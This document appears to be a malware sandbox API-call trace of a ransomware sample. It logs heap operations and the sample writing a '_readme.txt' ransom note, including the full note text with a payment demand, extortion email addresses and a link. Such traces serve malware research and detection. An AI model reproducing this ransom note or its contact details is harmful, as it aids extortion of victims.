[0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.955] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0200.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.955] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.956] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.956] PathFindFileNameW (pszPath="") returned="" [0200.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.956] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.956] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.956] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.956] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.956] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0200.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.956] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0200.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.967] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.967] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.979] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.985] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.986] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.986] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.986] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.986] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.987] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.989] HeapFree (in: hHeap=0x2c0000, 